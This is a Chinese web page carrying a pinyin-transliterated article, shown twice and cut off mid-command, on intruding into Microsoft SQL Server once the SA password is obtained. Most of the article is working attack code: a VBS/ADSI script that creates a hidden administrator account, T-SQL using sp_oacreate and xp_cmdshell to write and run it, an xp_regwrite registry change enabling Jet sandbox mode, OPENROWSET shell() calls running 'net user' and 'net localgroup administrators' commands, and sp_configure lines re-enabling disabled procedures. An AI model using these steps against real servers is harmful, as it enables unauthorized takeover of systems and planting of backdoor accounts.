| 订阅 | 在线投稿
分享
 
 
当前位置: 王朝网络 >> mssql >> Microsoft SQL Server SA quan xian zui xin ru qin fang fa
 

Microsoft SQL Server SA quan xian zui xin ru qin fang fa

2008-07-30 06:50:46 编辑來源:互联网 评论
 
本文为【Microsoft SQL Server SA权限最新入侵方法】的拼音翻译版
  zai huo de SA mi ma hou , wang wang yin wei fu wu qi guan li zhe huo ” qian ren ” jiang net.exe he net1.exe bei xian zhi shi yong , wu fa tian jia guan li yuan zhang hao 。 wo men zhi dao VBS zai huo dong mu lu (ADSI) bu fen you yi ge winnt dui xiang , yong lai guan li ben di zi yuan , li yong ta ke yi bu yi kao CMD deng ming ling jiu neng tian jia yi ge guan li yuan , ju ti dai ma ru xia :
  set wsnetwork=CreateObject("WSCRIPT.NETWORK")
  os="WinNT://"&wsnetwork.ComputerName
  Set ob=GetObject(os) ' de dao adsi jie kou , bang ding
  Set oe=GetObject(os&"/Administrators,group") ' shu xing ,admin zu
  Set od=ob.Create("user","test") ' jian li yong hu
  od.SetPassword "1234" ' she zhi mi ma
  od.SetInfo ' bao cun
  Set of=GetObject(os&"/test",user) ' de dao yong hu
  oe.add os&"/test"
  jiang shang mian de dai ma bao cun wei 1.vbs, ran hou zhi xing , ming ling wei “cscript 1.vbs”, zhe yang jiu hui zai xi tong tian jia yi ge xi tong ming wei test, mi ma wei 1234 de yong hu 。 ju ti zai cha xun fen xi qi zhi xing de dai ma ru xia :
  declare @o int, @f int, @t int, @ret int
  exec sp_oacreate 'scripting.filesystemobject', @o out
  exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1
  exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject
  ("WSCRIPT.NETWORK")'
  exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.
  ComputerName'
  exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
  exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject
  (os&"/Administrators,group")'
  exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create
  ("user","test")'
  exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "1234"'
  exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo '
  exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject
  (os&"/test",user) '
  exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"'
  zhi xing wan shang mian de yu ju , zai zhi xing xia mian zhe xing dai ma , zhe xing dai ma yi ding dan du zhi xing , bu yao yu shang mian de fang zai yi qi zhi xing , fou ze hui ti shi “c:\1.vbs zheng bei ling yi ge cheng xu yun xing ” er wu fa cheng gong tian jia yong hu :
  exec master..xp_cmdshell 'cscript c:\1.vbs'
  ru guo xi tong yong hu mei you tian jia cheng gong , you ke neng shi yin wei xi tong yong hu de mi ma 1234 de tai jian dan , bu fu he fu wu qi de fu duo mi ma ce lue , ke yi kao lv she zhi de fu duo xie , ran hou zai ce shi yi xia 。 ye ke yi shi yong echo jiang dai ma xie dao 1.vbs zhong , dai ma ge shi wei :
  exec master..xp_cmdshell 'echo set wsnetwork=CreateObject("WSCRIPT.NETWORK")
  >>1.vbs'
  bu guo , bu zhi dao wei shen me suo you dai “&” zi fu de ming ling xing dou wu fa xie ru 1.vbs, gan xing qu de peng you ke yi chang shi jie jue yi xia 。
  shi yong jet sha pan mo shi , ke yi jie jue XP_cmdshell deng cun chu guo cheng he xiang guan dong tai lian jie ku dai lai de fan nao 。 chu yu an quan yuan yin , xi tong mo ren qing kuang xia sha pan mo shi wei kai qi , zhe jiu xu yao xp_regwrite kai qi sha pan mo shi :
  Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0
  \Engines','SandBoxMode','REG_DWORD',1
  ran hou zhi xing sha pan ming ling , zai xi tong tian jia yi ge yong hu ming wei test, mi ma wei 1234 de yong hu :
  select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows
  \system32\ias\ias.mdb','select shell("cmd.exe /c net user test 1234 /add")')
  select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows
  \system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup
  administrators test /add")')
  bu tong de cao zuo xi tong , lu jing ye bu yi yang , xu yao gen ju qing kuang zuo xiu gai :
  NT/2K: c:\winnt\system32\
  XP/2003: c:\windows\system32\
  ling wai Microsoft SQL Server2005 zai mo ren qing kuang xia , yi xie cun chu guo cheng shi guan bi zhe de , xu yao ming ling da kai :
  kai qi XP_cmdshell:
  EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure
  'xp_cmdshell', 1;RECONFIGURE;
  kai qi 'OPENROWSET':
  exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure
  'Ad Hoc Distributed Queries',1;RECONFIGURE;
  kai qi 'sp_oacreate':
  exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp【原文】【汉音对照
 
 
 
 
 
 
 
 
日版宠物情人插曲《Winding Road》歌词

日版宠物情人2017的插曲,很带节奏感,日语的,女生唱的。 最后听见是在第8集的时候女主手割伤了,然后男主用嘴帮她吸了一下,插曲就出来了。 歌手:Def...

兄弟共妻,我成了他们夜里的美食

老钟家的两个儿子很特别,就是跟其他的人不太一样,魔一般的执着。兄弟俩都到了要结婚的年龄了,不管自家老爹怎么磨破嘴皮子,兄弟俩说不娶就不娶,老父母为兄弟两操碎了心...

如何磨出破洞牛仔裤?牛仔裤怎么剪破洞?

把牛仔裤磨出有线的破洞 1、具体工具就是磨脚石,下面垫一个硬物,然后用磨脚石一直磨一直磨,到把那块磨薄了,用手撕开就好了。出来的洞啊很自然的。需要猫须的话调几...

我就是扫描下图得到了敬业福和爱国福

先来看下敬业福和爱国福 今年春节,支付宝再次推出了“五福红包”活动,表示要“把欠大家的敬业福都还给大家”。 今天该活动正式启动,和去年一样,需要收集“五福”...

冰箱异味产生的原因和臭味去除的方法

有时候我们打开冰箱就会闻到一股异味,冰箱里的这种异味是因为一些物质发出的气味的混合体,闻起来让人恶心。 产生这些异味的主要原因有以下几点。 1、很多人有这种习...

 
 
zai huo de SA mi ma hou , wang wang yin wei fu wu qi guan li zhe huo ” qian ren ” jiang net.exe he net1.exe bei xian zhi shi yong , wu fa tian jia guan li yuan zhang hao 。 wo men zhi dao VBS zai huo dong mu lu (ADSI) bu fen you yi ge winnt dui xiang , yong lai guan li ben di zi yuan , li yong ta ke yi bu yi kao CMD deng ming ling jiu neng tian jia yi ge guan li yuan , ju ti dai ma ru xia : set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"&wsnetwork.ComputerName Set ob=GetObject(os) ' de dao adsi jie kou , bang ding Set oe=GetObject(os&"/Administrators,group") ' shu xing ,admin zu Set od=ob.Create("user","test") ' jian li yong hu od.SetPassword "1234" ' she zhi mi ma od.SetInfo ' bao cun Set of=GetObject(os&"/test",user) ' de dao yong hu oe.add os&"/test" jiang shang mian de dai ma bao cun wei 1.vbs, ran hou zhi xing , ming ling wei “cscript 1.vbs”, zhe yang jiu hui zai xi tong tian jia yi ge xi tong ming wei test, mi ma wei 1234 de yong hu 。 ju ti zai cha xun fen xi qi zhi xing de dai ma ru xia : declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1 exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject ("WSCRIPT.NETWORK")' exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork. ComputerName' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject (os&"/Administrators,group")' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create ("user","test")' exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "1234"' exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo ' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject (os&"/test",user) ' exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"' zhi xing wan shang mian de yu ju , zai zhi xing xia mian zhe xing dai ma , zhe xing dai ma yi ding dan du zhi xing , bu yao yu shang mian de fang zai yi qi zhi xing , fou ze hui ti shi “c:\1.vbs zheng bei ling yi ge cheng xu yun xing ” er wu fa cheng gong tian jia yong hu : exec master..xp_cmdshell 'cscript c:\1.vbs' ru guo xi tong yong hu mei you tian jia cheng gong , you ke neng shi yin wei xi tong yong hu de mi ma 1234 de tai jian dan , bu fu he fu wu qi de fu duo mi ma ce lue , ke yi kao lv she zhi de fu duo xie , ran hou zai ce shi yi xia 。 ye ke yi shi yong echo jiang dai ma xie dao 1.vbs zhong , dai ma ge shi wei : exec master..xp_cmdshell 'echo set wsnetwork=CreateObject("WSCRIPT.NETWORK") >>1.vbs' bu guo , bu zhi dao wei shen me suo you dai “&” zi fu de ming ling xing dou wu fa xie ru 1.vbs, gan xing qu de peng you ke yi chang shi jie jue yi xia 。 shi yong jet sha pan mo shi , ke yi jie jue XP_cmdshell deng cun chu guo cheng he xiang guan dong tai lian jie ku dai lai de fan nao 。 chu yu an quan yuan yin , xi tong mo ren qing kuang xia sha pan mo shi wei kai qi , zhe jiu xu yao xp_regwrite kai qi sha pan mo shi : Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0 \Engines','SandBoxMode','REG_DWORD',1 ran hou zhi xing sha pan ming ling , zai xi tong tian jia yi ge yong hu ming wei test, mi ma wei 1234 de yong hu : select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows \system32\ias\ias.mdb','select shell("cmd.exe /c net user test 1234 /add")') select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows \system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup administrators test /add")') bu tong de cao zuo xi tong , lu jing ye bu yi yang , xu yao gen ju qing kuang zuo xiu gai : NT/2K: c:\winnt\system32\ XP/2003: c:\windows\system32\ ling wai Microsoft SQL Server2005 zai mo ren qing kuang xia , yi xie cun chu guo cheng shi guan bi zhe de , xu yao ming ling da kai : kai qi XP_cmdshell: EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; kai qi 'OPENROWSET': exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE; kai qi 'sp_oacreate': exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp
󰈣󰈤
  免责声明:本文仅代表作者个人观点,与王朝网络无关。王朝网络登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述,其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
 
 
追忆.绯红色的审判
新竹的果子风
热裤女孩
凯宾斯基酒店随拍
金色草原
菜园小品
情人谷
广东惠州—巽寮湾的海景
 
>>返回首页<<
 为你推荐
 
 
 转载本文
 UBB代码 HTML代码
复制到剪贴板...
 
 热帖排行
 
 
 
 
©2005- 王朝网络 版权所有